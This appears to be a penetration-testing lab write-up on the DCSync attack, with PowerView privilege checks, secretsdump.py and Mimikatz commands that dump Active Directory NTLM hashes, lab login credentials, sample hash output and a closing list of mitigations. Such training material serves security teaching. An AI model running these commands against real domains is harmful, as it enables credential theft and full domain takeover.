19. DCSync

Overview

DCSync is a powerful attack technique used to extract password hashes from Active Directory (AD) by impersonating a domain controller. This method exploits the Directory Replication Service Remote Protocol to request replication of user credentials, allowing attackers to retrieve NTLM password hashes.

Scenario Setup

This section outlines how to leverage DCSync for full domain compromise using both Linux and Windows attack hosts. The following hosts will be used:

• Windows Attack Host (MS01): Accessible via RDP with htb-student:Academy_student_AD!

• Linux Attack Host: Accessible via SSH from MS01 with htb-student:HTB_@cademy_stdnt!

• Target Domain Controller: INLANEFREIGHT.LOCAL

Understanding DCSync

DCSync requires control over an account with domain replication privileges, specifically DS-Replication-Get-Changes-All. Typically, Domain Admins and Enterprise Admins have these privileges by default. However, other accounts may be granted these rights, making them valuable targets.

Checking User Privileges

We first verify if our compromised user adunn has the necessary permissions.

Viewing adunn's Group Membership

Get-DomainUser -Identity adunn | select samaccountname, objectsid, memberof, useraccountcontrol | fl

Checking Replication Rights

$sid = "S-1-5-21-3842939050-3880317879-2865463114-1164"
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | 
? { ($_.ObjectAceType -match 'Replication-Get') } | 
? { $_.SecurityIdentifier -match $sid } | 
select AceQualifier, ObjectDN, ActiveDirectoryRights, SecurityIdentifier, ObjectAceType | fl

If DS-Replication-Get-Changes-All appears in the output, adunn has the required privileges.

Executing the DCSync Attack

DCSync can be executed using Impacket’s secretsdump.py or Mimikatz.

Using secretsdump.py (Linux)

secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5

Example Output:

inlanefreight.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::
inlanefreight.local\htb-student:1111:aad3b435b51404eeaad3b435b51404ee:2487a01dd672b583415cb52217824bb5:::

To target a specific user:

secretsdump.py -just-dc-user administrator INLANEFREIGHT/adunn@172.16.5.5

Using Mimikatz (Windows)

Run as adunn:

runas /netonly /user:INLANEFREIGHT\adunn powershell

Execute DCSync:

mimikatz.exe
privilege::debug
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator

Example Output:

SAM Username         : administrator
Hash NTLM           : 88ad09182de639ccc6579eb0849751cf

Additional Enumeration

If password history is needed:

secretsdump.py -history -just-dc INLANEFREIGHT/adunn@172.16.5.5

To check password last set dates:

Get-ADUser -Filter * -Properties PwdLastSet | select SamAccountName, PwdLastSet

Mitigation Strategies

1. Restrict Replication Privileges: Limit DS-Replication-Get-Changes-All to only domain controllers.

2. Enable Monitoring & Logging:

   • Use Event ID 4662 (Audit Directory Service Access) to detect abnormal replication requests.

   • Monitor Event ID 4742 (user account changes) for privilege escalation attempts.

3. Implement the Principle of Least Privilege (PoLP): Ensure only necessary users have replication rights.

4. Use Managed Service Accounts: Replace regular user accounts for sensitive operations.

5. Enable LAPS (Local Administrator Password Solution): Prevent local admin credential reuse.

Conclusion

DCSync is a critical attack vector that can lead to full domain compromise. Understanding detection and mitigation strategies is essential to securing Active Directory environments. By proactively auditing privileges and monitoring replication requests, organizations can significantly reduce their risk exposure.